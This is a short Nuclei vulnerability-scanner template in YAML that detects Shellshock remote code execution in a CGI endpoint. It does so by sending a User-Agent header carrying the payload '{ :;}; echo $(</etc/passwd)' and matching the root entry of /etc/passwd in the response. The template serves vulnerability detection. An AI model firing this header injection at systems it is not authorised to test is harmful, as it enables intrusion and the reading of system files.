nuclei-templates/vulnerabilities/rce-shellshock-user-agent.yaml

19 lines
332 B
YAML

id: rce-user-agent-shell-shock
info:
name: Remote Code Execution Via (User-Agent)
author: 0xelkomy
severity: high
requests:
- method: GET
headers:
User-Agent: "{ :;}; echo $(</etc/passwd)"
path:
- "{{BaseURL}}/cgi-bin/status"
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body